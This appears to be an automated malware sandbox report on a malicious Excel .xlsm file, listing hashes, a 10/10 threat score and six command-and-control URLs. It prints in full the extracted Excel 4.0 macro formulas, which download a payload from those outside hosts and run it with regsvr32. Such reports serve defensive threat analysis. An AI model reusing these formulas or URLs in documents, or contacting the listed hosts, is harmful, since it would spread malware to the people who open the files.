General

  • Target

    90d109672510705c132e7a59afa17e3bc6bc5939ef48f33b58b074373ffec475

  • Size

    45KB

  • MD5

    2cdde2ae8f79fbe4a9f584ca54a394cd

  • SHA1

    5dc73bd9ae2f8d96e6fa867f4e7075cb969a8aa7

  • SHA256

    90d109672510705c132e7a59afa17e3bc6bc5939ef48f33b58b074373ffec475

  • SHA512

    b2762de1c97acc4bb4c99d30ae1da6aaf218da825380ddf9da14b1c4691b76b91a0515801d35ee4135f885586133f189d1547760d9ef67eefdded571190eb7de

  • SSDEEP

    768:q+oDxDOevZCwrvt8zdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Ud0U2XCnM:1oDxD8tT5fTR4Lh1NisFYBc3cr+U2USz

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://api.zmotpro.com/totalenvironment/logs/8wdgNaq0x/

http://aetoaluminium.com/wp-admin/gkqyKlzXoc/

http://24studypoint.com/wp-admin/3uEUtb/

https://baicc-ct.org/wp-admin/IwhcfC2sdxoToa/

https://mustknew.com/lovecalculator/osDBhPqx0tB1Vtp/

http://kiski023.com/wp-includes/Requests/Cookie/C/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://api.zmotpro.com/totalenvironment/logs/8wdgNaq0x/","..\enu.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aetoaluminium.com/wp-admin/gkqyKlzXoc/","..\enu.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://24studypoint.com/wp-admin/3uEUtb/","..\enu.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://baicc-ct.org/wp-admin/IwhcfC2sdxoToa/","..\enu.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://mustknew.com/lovecalculator/osDBhPqx0tB1Vtp/","..\enu.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kiski023.com/wp-includes/Requests/Cookie/C/","..\enu.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • 90d109672510705c132e7a59afa17e3bc6bc5939ef48f33b58b074373ffec475
    .xlsm office2007